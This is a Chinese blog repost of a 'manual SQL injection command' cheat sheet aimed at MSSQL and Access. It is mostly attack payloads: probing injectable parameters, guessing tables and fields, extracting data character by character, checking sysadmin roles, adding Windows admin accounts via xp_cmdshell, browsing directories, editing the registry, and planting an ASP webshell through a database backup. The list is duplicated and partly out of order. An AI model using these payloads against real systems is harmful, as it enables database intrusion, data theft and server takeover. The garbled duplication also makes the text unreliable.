SQL手动注入脚本命令精华版

最新推荐文章于 2024-08-20 20:45:00 发布
最新推荐文章于 2024-08-20 20:45:00 发布
阅读量698 收藏
点赞数
分类专栏: SQL 文章标签: 脚本 sql insert 数据库 xp table
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xjzdr/article/details/6264341
版权

手动注入脚本命令精华版
作者:未知 来源:CnXHacker.Net 

1.判断是否有注入;and 1=1 ;and 1=2   

2.初步判断是否是mssql ;and user>0   

3.注入参数是字符’and [查询条件] and ’’=’   

4.搜索时没过滤参数的’and [查询条件] and ’%25’=’   

5.判断数据库系统   
;and (select count(*) from sysobjects)>0 mssql   
;and (select count(*) from msysobjects)>0 access   

6.猜数据库 ;and (select Count(*) from [数据库名])>0   

7.猜字段 ;and (select Count(字段名) from 数据库名)>0  1.判断是否有注入;and 1=1 ;and 1=2   

2.初步判断是否是mssql ;and user>0   

3.注入参数是字符’and [查询条件] and ’’=’   

4.搜索时没过滤参数的’and [查询条件] and ’%25’=’   

5.判断数据库系统   
;and (select count(*) from sysobjects)>0 mssql   
;and (select count(*) from msysobjects)>0 access   

6.猜数据库 ;and (select Count(*) from [数据库名])>0   

7.猜字段 ;and (select Count(字段名) from 数据库名)>0   

8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0   

9.(1)猜字段的ascii值(access)   
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0   

(2)猜字段的ascii值(mssql)   
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0   

10.测试权限结构(mssql)   
;and 1=(select IS_SRVROLEMEMBER(’sysadmin’));--   
;and 1=(select IS_SRVROLEMEMBER(’serveradmin’));--   
;and 1=(select IS_SRVROLEMEMBER(’setupadmin’));--   
;and 1=(select IS_SRVROLEMEMBER(’securityadmin’));--   
;and 1=(select IS_SRVROLEMEMBER(’diskadmin’));--   
;and 1=(select IS_SRVROLEMEMBER(’bulkadmin’));--   
;and 1=(select IS_MEMBER(’db_owner’));--   

11.添加mssql和系统的帐户   
;exec master.dbo.sp_addlogin username;--   

;exec master.dbo.sp_password null,username,password;--    

;exec master.dbo.sp_addsrvrolemember sysadmin username;--   

;exec master.dbo.xp_cmdshell ’net user username password    
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add’;--   

;exec master.dbo.xp_cmdshell ’net user username password /add’;--    

;exec master.dbo.xp_cmdshell ’net localgroup administrators username /add’;--    

12.(1)遍历目录   

;create table dirs(paths varchar(100), id int)   
;insert dirs exec master.dbo.xp_dirtree ’c:/’   
;and (select top 1 paths from dirs)>0   
;and (select top 1 paths from dirs where paths not in(’上步得到的paths’))>)   

(2)遍历目录   
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar

(255));--   
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器   
;insert into temp(id) exec master.dbo.xp_subdirs ’c:/’;-- 获得子目录列表   
;insert into temp(id,num1) exec master.dbo.xp_dirtree ’c:/’;-- 获得所有子目录的目录树构  

 
;insert into temp(id) exec master.dbo.xp_cmdshell ’type c:/web/index.asp’;-- 查看文件的内

容   

13.mssql中的存储过程   

xp_regenumvalues 注册表根键, 子键   
;exec xp_regenumvalues ’HKEY_LOCAL_MACHINE’,’

SOFTWARE/Microsoft/Windows/CurrentVersion/Run’ 以多个记录集方式返回所有键值   

xp_regread 根键,子键,键值名   
;exec xp_regread   
’HKEY_LOCAL_MACHINE’,’SOFTWARE/Microsoft/Windows/CurrentVersion’,’CommonFilesDir’ 返

回制定键的值   

xp_regwrite 根键,子键, 值名, 值类型, 值   
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型   
;exec xp_regwrite ’HKEY_LOCAL_MACHINE’,’SOFTWARE/Microsoft/Windows/CurrentVersion’,’

TestValueName’,’reg_sz’,’hello’ 写入注册表   

xp_regdeletevalue 根键,子键,值名   

exec xp_regdeletevalue ’HKEY_LOCAL_MACHINE’,’SOFTWARE/Microsoft/Windows/CurrentVersion’

,’TestValueName’ 删除某个值   

xp_regdeletekey ’HKEY_LOCAL_MACHINE’,’SOFTWARE/Microsoft/Windows/CurrentVersion/Testkey

’ 删除键,包括该键下所有值   

14.mssql的backup创建webshell    
use model   
create table cmd(str image);   
insert into cmd(str) values (’’);   
backup database model to disk=’c:/l.asp’;   

15.mssql内置函数   
;and (select @@version)>0 获得Windows的版本号   
;and user_name()=’dbo’ 判断当前系统的连接用户是不是sa   
;and (select user_name())>0 爆当前系统的连接用户   
;and (select db_name())>0 得到当前连接的数据库   

16.简洁的webshell   

use model   

create table cmd(str image);   

insert into cmd(str) values (’’);   

backup database model to disk=’g:/wwwtest/l.asp’; 

8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0   

9.(1)猜字段的ascii值(access)   
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0   

(2)猜字段的ascii值(mssql)   
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0   

10.测试权限结构(mssql)   
;and 1=(select IS_SRVROLEMEMBER(’sysadmin’));--   
;and 1=(select IS_SRVROLEMEMBER(’serveradmin’));--   
;and 1=(select IS_SRVROLEMEMBER(’setupadmin’));--   
;and 1=(select IS_SRVROLEMEMBER(’securityadmin’));--   
;and 1=(select IS_SRVROLEMEMBER(’diskadmin’));--   
;and 1=(select IS_SRVROLEMEMBER(’bulkadmin’));--   
;and 1=(select IS_MEMBER(’db_owner’));--   

11.添加mssql和系统的帐户   
;exec master.dbo.sp_addlogin username;--   

;exec master.dbo.sp_password null,username,password;--    

;exec master.dbo.sp_addsrvrolemember sysadmin username;--   

;exec master.dbo.xp_cmdshell ’net user username password    
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add’;--   

;exec master.dbo.xp_cmdshell ’net user username password /add’;--    

;exec master.dbo.xp_cmdshell ’net localgroup administrators username /add’;--    

12.(1)遍历目录   

;create table dirs(paths varchar(100), id int)   
;insert dirs exec master.dbo.xp_dirtree ’c:/’   
;and (select top 1 paths from dirs)>0   
;and (select top 1 paths from dirs where paths not in(’上步得到的paths’))>)   

(2)遍历目录   
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar

(255));--   
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器   
;insert into temp(id) exec master.dbo.xp_subdirs ’c:/’;-- 获得子目录列表   
;insert into temp(id,num1) exec master.dbo.xp_dirtree ’c:/’;-- 获得所有子目录的目录树构  

 
;insert into temp(id) exec master.dbo.xp_cmdshell ’type c:/web/index.asp’;-- 查看文件的内

容   

13.mssql中的存储过程   

xp_regenumvalues 注册表根键, 子键   
;exec xp_regenumvalues ’HKEY_LOCAL_MACHINE’,’

SOFTWARE/Microsoft/Windows/CurrentVersion/Run’ 以多个记录集方式返回所有键值   

xp_regread 根键,子键,键值名   
;exec xp_regread   
’HKEY_LOCAL_MACHINE’,’SOFTWARE/Microsoft/Windows/CurrentVersion’,’CommonFilesDir’ 返

回制定键的值   

xp_regwrite 根键,子键, 值名, 值类型, 值   
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型   
;exec xp_regwrite ’HKEY_LOCAL_MACHINE’,’SOFTWARE/Microsoft/Windows/CurrentVersion’,’

TestValueName’,’reg_sz’,’hello’ 写入注册表   

xp_regdeletevalue 根键,子键,值名   

exec xp_regdeletevalue ’HKEY_LOCAL_MACHINE’,’SOFTWARE/Microsoft/Windows/CurrentVersion’

,’TestValueName’ 删除某个值   

xp_regdeletekey ’HKEY_LOCAL_MACHINE’,’SOFTWARE/Microsoft/Windows/CurrentVersion/Testkey

’ 删除键,包括该键下所有值   

14.mssql的backup创建webshell    
use model   
create table cmd(str image);   
insert into cmd(str) values (’’);   
backup database model to disk=’c:/l.asp’;   

15.mssql内置函数   
;and (select @@version)>0 获得Windows的版本号   
;and user_name()=’dbo’ 判断当前系统的连接用户是不是sa   
;and (select user_name())>0 爆当前系统的连接用户   
;and (select db_name())>0 得到当前连接的数据库   

16.简洁的webshell   

use model   

create table cmd(str image);   

insert into cmd(str) values (’’);   

backup database model to disk=’g:/wwwtest/l.asp’;
 

 

xjzdr
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
Sql2005注入辅助脚本[修改版]
10-30
脚本中也提到了可以使用SQL注入方式下载文件(如sql2005***\1.gifdownload)和执行服务器上的命令(如sql2005vercmd)。这表明工具提供了文件操作和远程命令执行的能力。 7. 数据库枚举和表及字段信息获取: Sql...
SQL注入常用命令详解
qq_45174221的博客
01-18 2701
当前文章都是对SQL手工注入的讲解,你对手工注入的原理有了一定了解,可以使用sqlmap一把梭,提高注入效率。
从零开始学SQL注入sql十大注入类型):技术解析与实战演练
xt350488的博客
06-17 1756
SQL 注入是比较常见的网络攻击方式之一,它不是利用操作系统的 BUG 来实现攻击,而是针对程序员编写时的疏忽,通过 SQL 语句,实现无账号登录,甚至篡改数据库。由于以下的环境都是 MySQL 数据库,所以先了解点 MySQL 有关的知识。在 MySQL5.0 之后,MySQL 中默认添加了一个名为的数据库,该数据库中的表都是只读的,不能进行更新、删除和插入等操作,也不能加载触发器,因为它们实际只是一个视图,不是基本表,没有关联的文件。mysql中注释符:# 、/**/ 、 --schemata。
从0到1,SQL注入sql十大注入类型)收藏这一篇就够了,技术解析与实战演练
黑战士的博客
06-26 1149
SQL 注入是比较常见的网络攻击方式之一,它不是利用操作系统的 BUG 来实现攻击,而是针对程序员编写时的疏忽,通过 SQL 语句,实现无账号登录,甚至篡改数据库。由于以下的环境都是 MySQL 数据库,所以先了解点 MySQL 有关的知识。在 MySQL5.0 之后,MySQL 中默认添加了一个名为的数据库,该数据库中的表都是只读的,不能进行更新、删除和插入等操作,也不能加载触发器,因为它们实际只是一个视图,不是基本表,没有关联的文件。mysql中注释符:# 、/**/ 、 --
SQL注入脚本命令
ymebnqv99bj的专栏
05-20 501
1.判断是否有注入;and 1=1 ;and 1=2   2.初步判断是否是mssql ;and user>0   3.注入参数是字符'and [查询条件] and ''='   4.搜索时没过滤参数的'and [查询条件] and '%25'='   5.判断数据库系统   ;and (select count(*) from sysobjects)>0 mssql
自己练习用的SQL注入脚本
https://www.cnblogs.com/zpchcbd/
05-03 1815
<?php @header('Content-Type: text/html; charset=utf-8'); //网页编码 $db_host="localhost"; //数据库主机 $db_user="root"; //用户名 $db_pass="root"; //密码 $db_name="sql_injection"; //数据库名称 $id=@$_GET['id']; $conn=...
SQL脚本注入
heibaikong6的博客
09-08 2110
条件 当SQL注入时没有显示输出,也没有报错输出;但是在每个网页打开时,都会将输入的语句写入到一个文件中。 思路 利用上述条件可以将输入的sql语句写成一个一句话木马通过访问网站将一句话木马写入到后端文件中,进而通过中国菜刀进行进一步控制 步骤 依旧进行试验,得到闭合 测试列数 找到路径 写入木马(一定要找到具有写的权限的路径) 利用中国菜刀进行控制 进入网页所在的服务器 得到数据 一句话木...
安全测试-常见sql注入方法,命令
03-31
安全测试-常见sql注入方法,命令安全测试-常见sql注入方法,命令安全测试-常见sql注入方法,命令安全测试-常见sql注入方法,命令安全测试-常见sql注入方法,命令安全测试-常见sql注入方法,命令安全测试-常见sql注入...
asp中一段防SQL注入的通用脚本
10-30
- **作用**:通过这种方式,可以有效地阻止攻击者通过URL注入恶意SQL命令。 ##### 屏蔽通过表单攻击 ```vb foreach item in Request.Form strItem = LCase(Server.HTMLEncode(Request.Form(item))) if InStr...
SQL注入脚本SQL注入脚本
11-26
在.NET框架中,可以通过使用预编译的SQL命令和参数对象来实现这一目标。例如,在给定的代码片段中,使用`SqlCommand`和`SqlParameter`对象替代字符串拼接: ```csharp SqlCommand command = new SqlCommand(...
SQL 时间盲注 (injection 第十六关)
最新发布
baishiqi12的博客
08-20 435
SQL 注入,仅供参考
SQL - 基础大汇总
心如冰清,天塌不惊
08-16 502
【代码】数据库 - 基础。
掌握SQL的威力:批量更新与删除的艺术
2401_85341950的博客
08-17 812
批量更新和删除是数据库管理中的重要操作,正确使用SQL可以大大提高数据处理的效率。通过本文的学习,读者应该能够理解并掌握如何安全、有效地执行这些操作。希望本文能够帮助您在数据库管理的道路上更进一步。以上就是关于如何使用SQL进行数据的批量更新或删除的详细介绍和代码示例,希望能够对您有所帮助。如果您有任何疑问或需要进一步的讨论,请随时联系我们。
SQL - 多表查询
心如冰清,天塌不惊
08-18 463
【代码】SQL - 多表查询。
SQL的连接查询与pandas的对应关系
C'mon的博客
08-16 754
SQL和Pandas中,连接查询(join)是处理数据集之间关系的重要工具。
鸿萌数据恢复服务:SQL Server 中的 GAM、SGAM、IAM,及数据库损坏的修复方法
sanyuan7783的博客
08-16 993
全局分配映射 (GAM) 负责处理数据库内的分配区,有助于在需要时识别空闲区。共享分配映射 (SGAM) 页类似于粒度图,处理数据库中特定文件组的扩展分配。索引分配映射 (IAM) 页是特殊的内部页,其作用类似于数据存储的注册表,跟踪数据页在数据库文件中的位置。
HiveSQL实战——大厂面试真题
爱吃辣条的博客
08-14 1125
HiveSQL实战——大厂面试真题
Python编码系列—Python SQL与NoSQL数据库交互:深入探索与实战应用
u013889591的专栏
08-17 906
在数据驱动的现代应用开发中,数据库扮演着核心角色。Python作为一种灵活的编程语言,提供了与SQL和NoSQL数据库交互的强大工具。本文将深入探讨Python如何与SQL和NoSQL数据库进行交互,并展示在实际项目中的应用案例。SQL(Structured Query Language)数据库以其结构化查询和事务性操作而广受欢迎。而NoSQL(Not Only SQL数据库则以其灵活的数据模型、水平扩展能力和高性能等特点,应对了大数据和高并发的挑战。
hive sql 处理多层 json 数组
第一片心意的博客
08-15 896
通过 hive sql,展开包含多层 json 数组的字符串,然后获取到每个子 json 中的值。
Oracle SQL脚本执行技巧与常用命令速查
- **SQL>/** 用于重新执行上一条已提交的SQL命令,这对于检查语法错误或者测试单个语句的效果十分方便。 4. **输出到文件** - **SQL>SPOOL file_name** 用于将屏幕上的所有内容,包括输入的SQL语句,写入到指定的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

xjzdr

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值